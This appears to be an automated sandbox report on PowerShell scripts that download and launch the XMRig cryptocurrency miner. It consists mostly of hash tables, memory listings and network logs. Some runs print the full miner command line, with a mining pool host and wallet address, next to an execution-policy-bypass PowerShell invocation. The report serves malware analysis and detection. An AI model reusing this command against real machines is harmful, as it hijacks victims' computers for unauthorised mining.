memory/5056-2-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp

memory/5056-5-0x000001E8C8F40000-0x000001E8C8F62000-memory.dmp

memory/5056-7-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/5056-10-0x000001E8C90F0000-0x000001E8C9166000-memory.dmp

memory/5056-11-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5qsnrce.mre.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5056-28-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/5056-52-0x000001E8C90D0000-0x000001E8C90E2000-memory.dmp

memory/5056-65-0x000001E8C90B0000-0x000001E8C90BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1736-94-0x00000184BB6A0000-0x00000184BB6C0000-memory.dmp

memory/5056-95-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp

memory/5056-96-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/1736-97-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/5056-98-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp

memory/1736-99-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-100-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-101-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-102-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-103-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-104-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-105-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-106-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-107-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-108-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-109-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-110-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-111-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-112-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-113-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-114-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-115-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-116-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-117-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-118-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-119-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-120-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-121-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-122-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-123-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-124-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-125-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-126-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-127-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-128-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-129-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-130-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-131-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-132-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-133-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-134-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-135-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-136-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-137-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-138-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-139-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-140-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-141-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-142-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-143-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-144-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-145-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-146-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-147-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-148-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-149-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-150-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-151-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-152-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-153-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-154-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-155-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-156-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-157-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-158-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-159-0x00007FF614920000-0x00007FF615553000-memory.dmp

memory/1736-160-0x00007FF614920000-0x00007FF615553000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:09

Platform

win11-20240419-en

Max time kernel

1765s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbimhkb.tdq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2440-9-0x000001A87C190000-0x000001A87C1B2000-memory.dmp

memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-13-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2440-14-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win7-20240508-en

Max time kernel

1559s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

N/A

Files

memory/1252-4-0x000007FEF57EE000-0x000007FEF57EF000-memory.dmp

memory/1252-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1252-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/1252-7-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-9-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-10-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-11-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-8-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

memory/1252-12-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:16

Platform

win11-20240508-en

Max time kernel

1742s

Max time network

1751s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/2628-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0u44g2s.p3r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2628-9-0x00000233FA960000-0x00000233FA982000-memory.dmp

memory/2628-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-13-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2628-14-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:16

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/600-4-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/600-5-0x000001CD6DA20000-0x000001CD6DA42000-memory.dmp

memory/600-6-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-9-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-10-0x000001CD6DBF0000-0x000001CD6DC66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f2exdr3m.1y4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/600-25-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-48-0x000001CD6DF70000-0x000001CD6DF82000-memory.dmp

memory/600-61-0x000001CD6DAB0000-0x000001CD6DABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/924-90-0x00000139DF730000-0x00000139DF750000-memory.dmp

memory/924-91-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-92-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/600-93-0x00007FF85FEF3000-0x00007FF85FEF4000-memory.dmp

memory/600-94-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/600-95-0x00007FF85FEF0000-0x00007FF8608DC000-memory.dmp

memory/924-96-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-97-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-98-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-99-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-100-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-101-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-102-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-103-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-104-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-105-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-106-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-107-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-108-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-109-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-110-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-111-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-112-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-113-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-114-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-115-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-116-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-117-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-118-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-119-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-120-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-121-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-122-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-123-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-124-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-125-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-126-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-127-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-128-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-129-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-130-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-131-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-132-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-133-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-134-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-135-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-136-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-137-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-138-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-139-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-140-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-141-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-142-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-143-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-144-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-145-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-146-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-147-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-148-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-149-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-150-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-151-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-152-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-153-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-154-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-155-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

memory/924-156-0x00007FF67C5B0000-0x00007FF67D1E3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win10v2004-20240426-en

Max time kernel

1797s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/1396-0-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jswlmnae.hiq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-10-0x0000022F67E70000-0x0000022F67E92000-memory.dmp

memory/1396-11-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-12-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-14-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-15-0x0000022F68240000-0x0000022F68252000-memory.dmp

